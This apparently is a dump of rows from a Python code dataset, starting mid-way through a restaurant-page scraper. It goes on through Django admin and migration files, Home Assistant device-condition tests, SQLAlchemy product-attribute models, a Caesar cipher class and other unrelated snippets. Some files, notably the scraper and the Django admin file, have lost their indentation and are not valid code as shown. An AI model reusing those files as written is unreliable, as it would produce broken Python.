        # category name
try:
category_name = info.split('<th>ジャンル</th>')[1].split('<td>')[1].split('</td>')[0].split('<span>')[1].split('</span>')[0].strip()
except:
category_name="NULL"
pass
print(category_name)
        # reservation phone number
try:
reserve_tel = info.split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
reserve_tel="NULL"
pass
print(reserve_tel)
        # prefecture
try:
prefecture = info.split('<p class="rstinfo-table__address">')[1].split('/">')[1].split('</a>')[0].strip()
except:
prefecture="NULL"
pass
print(prefecture)
        # district
try:
district = info.split('<p class="rstinfo-table__address">')[1].split('/rstLst/')[1].split('">')[1].split('</a>')[0].strip()
except:
district="NULL"
pass
print(district)
        # number of seats
try:
seat_num = info.split('<th>席数</th>')[1].split('<td>')[1].split('</td>')[0].split('<p>')[1].split('席</p>')[0].strip()
except:
seat_num="NULL"
pass
print(seat_num)
        # official Facebook account
try:
facebook = info.split('rstinfo-sns-link rstinfo-sns-facebook')[1].split('<span>')[1].split('</span>')[0].strip()
except:
facebook="NULL"
pass
print(facebook)
        # restaurant phone number
try:
restaurant_tel = info.split('<th>電話番号</th>')[1].split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
restaurant_tel="NULL"
pass
print(restaurant_tel)
        # homepage
try:
homepage = info.split('<th>ホームページ</th>')[1].split('<span>')[1].split('</span>')[0].strip()
except:
homepage="NULL"
pass
print(homepage)
        # opening date
try:
open_date = info.split('rstinfo-opened-date">')[1].split('</p>')[0].strip()
except:
open_date="NULL"
pass
print(open_date)
        # append the values to the CSV list in order
csvlist.append([store_name, score, review_num, item_url, category_name, reserve_tel, prefecture, district, seat_num, facebook, restaurant_tel, homepage, open_date])
if page_num >= end_page:
print(csvlist)
break
page_num += 1
# write the output
writecsv.writerows(csvlist)
# close the CSV file
f.close()
| [
"[email protected]"
]
| |
4cb3844e79b7b04d524f902a1436ea166712750d | 7bc1d2a995ce6488c7dd20909a6f9443d6d8ced8 | /admin.py | f9970ac554b7883eb5ab7ee1f153581bbdd2be7d | []
| no_license | strategy2231/django_learn | dd4f7d1bd77157b893a8ea2d8355e980898687f5 | 9b9544c24d42892acef53943eb707bc5b8ca48c3 | refs/heads/master | 2021-01-12T16:01:43.756219 | 2016-10-25T18:45:48 | 2016-10-25T18:45:48 | 71,918,737 | 0 | 0 | null | 2016-10-25T18:40:31 | 2016-10-25T16:50:45 | Python | UTF-8 | Python | false | false | 612 | py |
# Register your models here.
from django.contrib import admin
from restaurants.models import Restaurant, Food,Comment
class RestaurantAdmin(admin.ModelAdmin):
list_display = ('name', 'phone_number', 'address','date')
search_fields = ('name',)
class FoodAdmin(admin.ModelAdmin):
list_display = ('name', 'restaurant', 'price','is_spicy','comment','date')
list_filter = ('is_spicy',)
#fields = ('price','restaurant')
search_fields = ('name',)
ordering = ('-price',)
admin.site.register(Restaurant,RestaurantAdmin)
admin.site.register(Food,FoodAdmin)
admin.site.register(Comment) | [
"[email protected]"
]
| |
641513afa36e0a025b2386b2d085f86762f8831c | 414e0f17a1da288c5e7e7753eb51e44457480637 | /General/migrations/0002_auto_20190313_1534.py | 713c68f71c7cff04bfc69ae12424b2d9f7e74d5e | []
| no_license | livemonkey1300/ajax | ccb0103535c348cb2cf7190615bc1b696da6d469 | 429d1e6ebb32ef36cf320a9211b1430396e33576 | refs/heads/master | 2020-04-27T14:23:58.523709 | 2019-03-18T20:55:09 | 2019-03-18T20:55:09 | 174,408,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | # Generated by Django 2.1.5 on 2019-03-13 15:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('General', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='exchange',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='virtual_machine',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='voip',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"[email protected]"
]
| |
c89805f2b8005e92a1594b95d1049d78bddbe0f2 | 4254edac798c604dc59b5d586b52357b75d9e302 | /day7/alvdevops0505/alvdevops0505/urls.py | 242561d038498dd1c909378c56d28c8934155de5 | []
| no_license | casey-smile/P27M01 | 5531c3e5874e9308deebcd90eb6aaf1b91eb42eb | 8fd3255c7785f63d5bc1c81d9703674ffc5fdf39 | refs/heads/master | 2022-09-23T14:28:31.801166 | 2020-05-29T16:23:06 | 2020-05-29T16:23:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | """alvdevops0505 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('',include('users.urls', namespace='users')),
path('accounts/', include('accounts.urls', namespace='accounts')),
]
| [
"[email protected]"
]
| |
82792a3be9979e79865b11f08d068150204766e1 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /tests/components/select/test_device_condition.py | 7c1dc443e5626cdb246bbc9a3f633cbd756d466c | [
"Apache-2.0"
]
| permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 8,288 | py | """The tests for Select device conditions."""
from __future__ import annotations
import pytest
import voluptuous_serialize
from homeassistant.components import automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.select import DOMAIN
from homeassistant.components.select.device_condition import (
async_get_condition_capabilities,
)
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import (
config_validation as cv,
device_registry,
entity_registry,
)
from homeassistant.helpers.entity import EntityCategory
from homeassistant.setup import async_setup_component
from tests.common import (
MockConfigEntry,
assert_lists_same,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass: HomeAssistant) -> device_registry.DeviceRegistry:
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass: HomeAssistant) -> entity_registry.EntityRegistry:
"""Return an empty, loaded, registry."""
return mock_registry(hass)
@pytest.fixture
def calls(hass: HomeAssistant) -> list[ServiceCall]:
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_conditions(
hass: HomeAssistant,
device_reg: device_registry.DeviceRegistry,
entity_reg: entity_registry.EntityRegistry,
) -> None:
"""Test we get the expected conditions from a select."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": "selected_option",
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": False},
}
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
@pytest.mark.parametrize(
"hidden_by,entity_category",
(
(entity_registry.RegistryEntryHider.INTEGRATION, None),
(entity_registry.RegistryEntryHider.USER, None),
(None, EntityCategory.CONFIG),
(None, EntityCategory.DIAGNOSTIC),
),
)
async def test_get_conditions_hidden_auxiliary(
hass,
device_reg,
entity_reg,
hidden_by,
entity_category,
):
"""Test we get the expected conditions from a hidden or auxiliary entity."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(
DOMAIN,
"test",
"5678",
device_id=device_entry.id,
entity_category=entity_category,
hidden_by=hidden_by,
)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": condition,
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": True},
}
for condition in ["selected_option"]
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
async def test_if_selected_option(
hass: HomeAssistant, calls: list[ServiceCall]
) -> None:
"""Test for selected_option conditions."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "event", "event_type": "test_event1"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option1",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option1 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
{
"trigger": {"platform": "event", "event_type": "test_event2"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option2",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option2 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
]
},
)
# Test with non existing entity
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set(
"select.entity", "option1", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["result"] == "option1 - event - test_event1"
hass.states.async_set(
"select.entity", "option2", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["result"] == "option2 - event - test_event2"
async def test_get_condition_capabilities(hass: HomeAssistant) -> None:
"""Test we get the expected capabilities from a select condition."""
config = {
"platform": "device",
"domain": DOMAIN,
"type": "selected_option",
"entity_id": "select.test",
"option": "option1",
}
# Test when entity doesn't exists
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
# Mock an entity
hass.states.async_set("select.test", "option1", {"options": ["option1", "option2"]})
# Test if we get the right capabilities now
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [("option1", "option1"), ("option2", "option2")],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
| [
"[email protected]"
]
| |
3b93255b073c2a9385971e2b9e090d3cb24606ca | 22e4f8c3fd76f099ad05b8ea0e53366878358d44 | /oil_trading/data/prepare_bloomberg_data.py | 333c76de2173719dbaf37701e0db085f5be7f4dc | [
"MIT"
]
| permissive | queiyanglim/trading_algorithm | 272762b97bb3ab15e8174b2cea529f8df525e705 | 959de9ecb503b9de97528e06e57d40382dec9a65 | refs/heads/master | 2021-02-17T23:44:54.909650 | 2021-01-21T15:37:14 | 2021-01-21T15:37:14 | 245,137,152 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | import pandas as pd
def get_bbg_data():
""" Daily prices since 1990"""
path = "https://github.com/queiyanglim/trading_algorithm/raw/master/oil_trading/data/oil_prices.csv"
df_pull = pd.read_csv(path, header=[0], index_col = 0)
df_pull = df_pull[["CO1 Comdty", "CL1 Comdty"]]
df_pull.index.name = "timestamp"
df_pull = df_pull.rename(columns = {"CO1 Comdty": "brent",
"CL1 Comdty": "wti"})
df_pull.index = pd.to_datetime(df_pull.index, format = "%d/%m/%Y")
df = df_pull.copy()
df["spread"] = df.brent - df.wti
# df = df.tail(2000)
# df = np.log(df).diff()
df = df.dropna()
return df | [
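if __name__ == "__main__":
    # Quick sanity check: pull the series and inspect the most recent
    # Brent/WTI prices and their spread.
    df = get_bbg_data()
    print(df.tail())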
"[email protected]"
]
| |
44128fe6dc5acae5eb8b887074251d66121ca915 | fd1f0606ea14cfb69429430d4d8cb5a5a0616ee3 | /python_code/yolo/convert_to_jpg.py | e9816e8e62a6dc828bee1debc266feedf66b6dbb | []
| no_license | mukulbhave/viden | 4fbae0bbfefae2b7e35623de12123c4371037420 | 848b16fa32cd0f180ab80a98254edd2147ea3948 | refs/heads/master | 2023-06-01T16:29:40.131295 | 2021-06-16T10:37:17 | 2021-06-16T10:37:17 | 257,380,167 | 0 | 0 | null | 2021-06-01T16:53:22 | 2020-04-20T19:13:57 | Python | UTF-8 | Python | false | false | 1,146 | py | from PIL import Image
import os, sys,re , fnmatch
import numpy as np
import glob
input_path = "C:\\Users\\sudhir\\Downloads\\EngImg\\"
out="C:\\dataset\\viden_numberplates\\out\\"
def rename():
for index,item in enumerate(dirs):
if item.endswith(".xml"):
x=item.find('-')
print("Renaming "+item+" as "+out +item[x+1:])
#if os.path.isfile(path+item):
os.rename(path+item,out +item[x+1:])
def convert_png_to_jpg():
count = 1
for root, dirnames, filenames in os.walk(input_path):
print("processing: "+root)
for f_name in fnmatch.filter(filenames, '*.png'):
file_path=os.path.join(root, f_name)
print("reading file: "+file_path)
im = Image.open(file_path)
rgb_im = im.convert('RGB')
f_name=f_name.replace(".png",".jpg")
out_path= os.path.join(out, f_name)
print("saving: "+out_path)
rgb_im.save(out_path, 'JPEG', quality=90)
count+=1
print("Processed Files:"+str(count))
convert_png_to_jpg() | [
"[email protected]"
]
| |
d4703ba2bdb76a23ad5f3eef4f0eb86443e92219 | 93dd16432fcb4b42670f208edf81b2eb29f40d41 | /pycaesarcipher.py | 980eed0fa1ec667cce8da2834d93cf03891ce125 | [
"MIT"
]
| permissive | shyams1993/pycaesarcipher | d067f4fda7acdb5f70687d5262a6fbc39d5e3790 | a396f165cc9a103950d060c94e25f7f344e7b257 | refs/heads/master | 2022-06-27T17:28:48.417994 | 2020-05-07T10:05:25 | 2020-05-07T10:05:25 | 261,873,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,180 | py | class pycaesarcipher():
'''
DOCSTRING: This class contains the encipher function & decipher function to one of the most simplest substitution Ciphers - "Caesar's Cipher"
'''
def __init__(self):
return None
def caesar_encipher(self,word,shiftkey):
'''
DOCSTRING: Function to encipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To encrypt, it uses the basic formula : (character + shiftkey)
\nOUTPUT: The Enciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
        \nThen create another variable to call either the caesar_encipher() method or caesar_decipher() method using two positional arguments: target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_encipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then encipher to maintain uniformity.
'''
word = word.lower()
ciphertext = []
for w in range(len(word)):
x = (ord(word[w]) + shiftkey)
if x > 122:
y = (x-122)+96
ciphertext.append(chr(y))
elif ord(word[w]) == 32:
y = 32
ciphertext.append(chr(y))
else:
ciphertext.append(chr(x))
word = ''.join([str(s) for s in ciphertext])
return word
def caesar_decipher(self,word,shiftkey):
'''
DOCSTRING: Function to decipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To decipher, it uses the basic formula : (character - shiftkey)
\nOUTPUT: The deciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
\nThen create another variable to call either the caesar_encipher() method or caesae_decipher() method using two positional arguments : target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_decipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then decipher to maintain uniformity.
'''
word = word.lower()
plaintext = []
for w in range(len(word)):
x = (ord(word[w]) - shiftkey)
if x>=70 and x < 97:
y = (x-96)+122
plaintext.append(chr(y))
elif ord(word[w]) == 32:
plaintext.append(chr(32))
else:
plaintext.append(chr(x))
word = ''.join([str(s) for s in plaintext])
return word | [
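if __name__ == "__main__":
    # Usage sketch following the docstrings above: encipher with a shift
    # of 3, then decipher to recover the original text.
    cipher = pycaesarcipher()
    secret = cipher.caesar_encipher("hello world", 3)
    print(secret)                             # khoor zruog
    print(cipher.caesar_decipher(secret, 3))  # hello world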
"[email protected]"
]
| |
717a9d888661f024fbf061eb7916b15f9e48b045 | 77e9396349c6a41dfeec9e270aec37df5871b652 | /code/option2/sut_test.py | c8dfb9fca16c6263aa78dc96f2810518ee0f8cdb | []
| no_license | sryabkov/python_modules_vscode | b62682c465c2dca81749ec48bafb616cf99e59b4 | d1d88a0af55ba540d5e6ff230655a57723b9cb8b | refs/heads/master | 2020-04-24T06:30:56.350656 | 2019-02-21T00:08:26 | 2019-02-21T00:08:26 | 171,767,375 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | """
Test for sut.py
"""
from .sut import some_method_that_returns_string
def test_some_method_that_returns_string():
assert some_method_that_returns_string() == "noop"
if __name__ == "__main__":
test_some_method_that_returns_string()
| [
"[email protected]"
]
| |
a31cb5f185c80ea397b6d84e1e2a1d488a88fd68 | a383c318c17b382bc3acad86b106584123ec5cd5 | /tifa/models/product_attr.py | fb9b11ea5d0303b510746f3e2d342138c1d3f67e | [
"MIT"
]
| permissive | Jormungendr/tifa | 86f20aa8ca28548a5861c6dcd54ab12840aa0b0c | f703fd27f54000e7d51f06d2456d09cc79e0ab72 | refs/heads/master | 2023-07-13T08:21:26.464652 | 2021-08-24T14:19:52 | 2021-08-24T14:19:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,506 | py | import sqlalchemy as sa
from sqlalchemy.orm import relationship
from tifa.globals import Model
from tifa.models.attr import Attribute, AttributeValue
from tifa.models.product import ProductType, Product, ProductVariant
class AttributeProduct(Model):
__tablename__ = "attribute_product"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
attribute = relationship(Attribute)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
product_type = relationship(ProductType)
sort_order = sa.Column(sa.Integer, index=True)
class AssignedProductAttribute(Model):
__tablename__ = "assigned_product_attribute"
__table_args__ = (sa.UniqueConstraint("product_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
product_id = sa.Column(sa.ForeignKey("product.id"), nullable=False)
product = relationship(Product)
assignment_id = sa.Column(
sa.ForeignKey("attribute_product.id"),
nullable=False,
)
assignment = relationship(AttributeProduct)
class AssignedProductAttributeValue(Model):
__tablename__ = "assigned_product_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey("assigned_product_attribute.id"),
nullable=False,
)
assignment = relationship(AssignedProductAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
class AttributeVariant(Model):
__tablename__ = "attribute_variant"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
sort_order = sa.Column(sa.Integer, index=True)
attribute = relationship(Attribute)
product_type = relationship(ProductType)
class AssignedVariantAttribute(Model):
__tablename__ = "assigned_variant_attribute"
__table_args__ = (sa.UniqueConstraint("variant_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
variant_id = sa.Column(
sa.ForeignKey("product_variant.id"),
nullable=False,
)
assignment_id = sa.Column(
sa.ForeignKey("attribute_variant.id"),
nullable=False,
)
assignment = relationship(AttributeVariant)
variant = relationship(ProductVariant)
class AssignedVariantAttributeValue(Model):
__tablename__ = "assigned_variant_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey(
"assigned_variant_attribute.id",
),
nullable=False,
)
assignment = relationship(AssignedVariantAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
| [
"[email protected]"
]
| |
6fa040ec27c8ff99da03fcd41b34c7abf7a93b67 | 391cbb86dc881e9de9bb3b9b0cc15b9199389acb | /python/modularizing/child.py | 94d2c4545ebfa134e03e63fbe19001bacf0d6d6e | []
| no_license | jgreen7773/python_stack | 3291498959de2d289f4b534e5e8643df03375f97 | 2948e467895c18c61f5c91b5c2b80455223a5d63 | refs/heads/master | 2020-07-15T18:12:06.227271 | 2019-09-26T22:37:01 | 2019-09-26T22:37:01 | 205,622,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import parent
print(locals())
# If we import code from the sub-page to the main page, we don't want
# the code from there to be executed on our main page, so we use...
# something like this:
if __name__ == "__main__":
product = Product([args])
print(product)
print(product.add_tax(0.18)) | [
"[email protected]"
]
| |
206aeb7d68e86e28ec22ef45eb51ed4f80dead0f | 3886c78ffed288379a54865ec6e494a514207d0d | /caravantone/view/artist.py | a2cc6e6f37388a036a88955d095390ea26d1f3ea | []
| no_license | Attsun1031/caravantone | 34a2a8b612af7bafc49b063f50953abe469d393b | bc5a9e481649e67f2c631aaf55384a4fce051ba7 | refs/heads/master | 2021-06-11T14:31:43.966237 | 2014-07-20T03:41:08 | 2014-07-20T03:41:08 | 18,760,513 | 0 | 0 | null | 2021-06-01T21:53:28 | 2014-04-14T12:55:19 | JavaScript | UTF-8 | Python | false | false | 1,161 | py | # -*- coding: utf-8 -*-
from flask import request, jsonify
from caravantone import app
from caravantone.view.util import require_login, jsonify_list
from caravantone.model.artist import Artist
from caravantone.es.artist_suggestion import suggest_artist
from caravantone.repository import artist_repository, user_repository
@app.route("/artists", methods=['POST'])
@require_login
def create(user):
"""create new artist data
:param user: current user
:return: Response
"""
artist = artist_repository.find_by_freebase_topic_id(request.form.get('freebase_topic_id'))
if not artist:
artist = Artist(name=request.form.get('name'), freebase_topic_id=request.form.get('freebase_topic_id'))
user.check_artists(artist)
user_repository.save(user)
return jsonify(name=artist.name)
@app.route("/artists/suggest", methods=['GET'])
@require_login
def suggest(user):
"""suggest artist name
:param user: current user
:return: Response
"""
name = request.args.get('name', '')
artists = suggest_artist(name)
return jsonify_list([{'name': artist.name, 'id': artist.artist_id} for artist in artists])
| [
"[email protected]"
]
| |
26cf7f5c49e7790eba3ae1742d71f32697b120fb | fff114e3cb9568fd04e3ee3ccf4b8edac9aece81 | /djangoblog/blogapp/migrations/0004_gory.py | 077977c924d51289d1913c5381b2fee756863028 | []
| no_license | 15SaswatiSingh/Python-in-Django-Framwork-travel-and-tourism- | 1572a589e2ee93ff574ea8d5d68db7b77e34d02e | b4ae21ce2942c4a4db4524f6f164bb5b6f789c86 | refs/heads/master | 2023-03-16T01:57:15.486262 | 2019-03-01T11:23:39 | 2019-03-01T11:23:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | # Generated by Django 2.1.3 on 2019-02-09 03:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0003_auto_20190209_0013'),
]
operations = [
migrations.CreateModel(
name='gory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
]
| [
"[email protected]"
]
| |
8479fc36a34cd92829460ba09dac9233003f21e2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/588.py | bc85913e20b14805e33519ef4c6568305d07637f | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import math
def read(f):
n = int(f.readline().strip())
for i in xrange(n):
p, q = map(int, f.readline().strip().split('/'))
yield p, q
def main(f):
for i, (p, q) in enumerate(read(f)):
if 2 ** int(math.log(q) / math.log(2)) != q:
print("Case #{0}: impossible".format(i+1))
else:
n = int(math.ceil((math.log(q) - math.log(p)) / math.log(2)))
print("Case #{0}: {1}".format(i+1, n))
_input = """
5
1/2
3/4
1/4
2/23
123/31488
""".strip()
_output = """
Case #1: 1
Case #2: 1
Case #3: 2
Case #4: impossible
Case #5: 8
""".strip()
def test_main(compare=False):
import sys
from difflib import unified_diff
from StringIO import StringIO
if compare:
stdout = sys.stdout
sys.stdout = StringIO()
try:
main(StringIO(_input))
result = sys.stdout.getvalue().strip()
finally:
sys.stdout = stdout
print(result)
for line in unified_diff(result.splitlines(), _output.splitlines(),
'Output', 'Expect', lineterm=''):
print(line)
if result == _output:
print("OK")
else:
print("NG")
else:
main(StringIO(_input))
if __name__ == '__main__':
test = False
compare = False
if test:
test_main(compare)
else:
import sys
if len(sys.argv) > 1:
f = open(sys.argv[1])
main(f)
f.close()
else:
main(sys.stdin)
| [
"[email protected]"
]
| |
44f71b6be270f1b19df492c0580443c20b5fea64 | d5c659075525981f5683ebdabcebb6df6429efa4 | /lib/complement.py | c7cb5767abdc9130c5c173830f3a863683e1a778 | [
"MIT"
]
| permissive | baifengbai/QA-CivilAviationKG | eb2a955eb1b4eed00a8bee85fb37f5c7ea2d34d7 | 616cb8bf7b381a53be9726fd4a463c55667677d0 | refs/heads/master | 2022-12-09T15:53:20.268370 | 2020-09-10T15:39:34 | 2020-09-10T15:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | # 问题的填充
import re
import Levenshtein
from lib.regexp import RangeYear, RefsYear
from lib.mapping import map_digits, map_refs
def year_complement(question: str) -> str:
""" 年份自动填充,转换各种表示为数字表示。
例:11年 -> 2011年
两千一十一年 -> 2011年
11-15年 -> 2011年,2012年,2013年,2014年,2015年
13到15年 -> 2013年,2014年,2015年
13年比前年 -> 2013年比2011年
15年比大大前年 -> 2015年比2011年
16年比3年前 -> 2016年比2013年
16年与前三年相比 -> 2016年与2015年,2014年,2013年相比
"""
complemented = question
# 先填充范围
range_years = re.compile(RangeYear).findall(question)
last_year = ''
for (year, gap) in range_years:
year = year.strip('年')
if not gap:
new_year = map_digits(year)
else:
start, end = year.split(gap)
start_year, end_year = int(map_digits(start)), int(map_digits(end))
new_year = ','.join([str(start_year + i) for i in range(end_year - start_year + 1)])
last_year = new_year
complemented = complemented.replace(year, new_year)
    # Then, resolve relative year references
for i, pattern in enumerate(RefsYear):
ref_years = re.compile(pattern).findall(complemented)
if ref_years:
year = ref_years[0][-1]
new_year = map_refs(year, i, int(last_year))
complemented = complemented.replace(year, new_year)
break
return complemented
def index_complement(question: str, words: list,
len_threshold: int = 4,
ratio_threshold: float = 0.5) -> tuple:
"""对问题中的指标名词进行模糊查询并迭代返回最接近的项.
:param question: 问题
:param words: 查询范围(词集)
:param len_threshold: 最小的有效匹配长度
:param ratio_threshold: 最小匹配率
:return: 首次匹配结果
"""
charset = set("".join(words))
pattern = re.compile(f'([{charset}]+)')
for result in pattern.findall(question):
if len(result) < len_threshold:
continue
scores = []
for word in words:
score = Levenshtein.ratio(word, result)
scores.append(score)
        # The candidate with the highest score is the closest match
max_score = max(scores)
if max_score >= ratio_threshold:
return words[scores.index(max_score)], result
return None, None
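if __name__ == "__main__":
    # Usage sketch based on the docstring examples above; the actual output
    # depends on the patterns defined in lib.regexp and lib.mapping.
    print(year_complement('13年比前年'))  # expected: 2013年比2011年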
| [
"[email protected]"
]
| |
a4de72f9bc8c298600db4419ce1778b70f3c07b5 | 89dedd7f3c7acc81d12e2bcb2e716f9af9e5fa04 | /third_party/WebKit/Source/devtools/scripts/concatenate_application_code.py | e6984e04864e14767f6fd64ff23f1ddfb871c822 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft"
]
